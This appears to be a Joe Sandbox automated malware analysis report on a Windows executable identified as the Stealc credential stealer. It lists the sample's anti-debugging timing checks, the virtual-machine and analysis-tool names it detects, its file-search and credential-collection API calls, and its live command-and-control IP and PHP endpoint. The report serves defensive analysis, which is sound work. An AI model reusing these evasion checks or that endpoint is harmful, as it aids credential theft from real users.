                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE5CB second address: 8BE5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE5CF second address: 8BE5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2ACE second address: 8C2AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2AD8 second address: 8C2ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2ADC second address: 8C2AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FECB125BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2AE8 second address: 8C2B07 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB0CC2D0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FECB0CC2D0Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2B07 second address: 8C2B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FECB125BFD3h 0x00000010 jmp 00007FECB125BFD1h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CA9 second address: 8C2CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CAF second address: 8C2CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CBC second address: 8C2CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Bh 0x00000007 jmp 00007FECB0CC2D14h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CDF second address: 8C2CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CE5 second address: 8C2CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CEB second address: 8C2CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007FECB125BFC6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2E81 second address: 8C2E92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FECB0CC2D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C32AA second address: 8C32B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FECB125BFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3425 second address: 8C3438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FECB0CC2D06h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3F60 second address: 8C3F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3F65 second address: 8C3F6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6E99 second address: 8C6E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6E9D second address: 8C6EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jnp 00007FECB0CC2D06h 0x00000012 jmp 00007FECB0CC2D0Bh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2493 second address: 8E249F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FECB125BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E43B1 second address: 8E43BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E43BB second address: 8E43C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7359 second address: 8E735D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4FFD second address: 8F5002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F519A second address: 8F519E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F519E second address: 8F51A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F51A4 second address: 8F51AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5B4D second address: 8F5B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5B51 second address: 8F5B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5CD4 second address: 8F5CE8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECB125BFC6h 0x00000008 jng 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5CE8 second address: 8F5CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5CEE second address: 8F5CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA343 second address: 8FA348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180282 second address: 51802D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 1Eh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, 2294AE25h 0x0000000f jmp 00007FECB125BFD2h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FECB125BFCDh 0x0000001f add esi, 19A95726h 0x00000025 jmp 00007FECB125BFD1h 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51802D0 second address: 51802D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51802D5 second address: 51802E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB125BFCAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51802E3 second address: 51802F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51802F2 second address: 51802FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, di 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803D3 second address: 51803D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51803D7 second address: 51803DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8195EA second address: 8195F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8195F0 second address: 8195F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 661A5C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 897703 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00414570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F68A FindFirstFileA,0_2_0040F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00413EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                Source: file.exe, file.exe, 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2133647068.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133647068.00000000012B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2133647068.00000000012E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13667
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13664
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13718
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13686
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13678
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00417850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4788, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                Source: file.exe, file.exe, 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00417850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00417A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4788, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4788, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/?file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpRfile.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpbfile.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php1file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37file.exe, 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1541419
                        Start date and time:2024-10-24 20:19:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 2s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 83
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
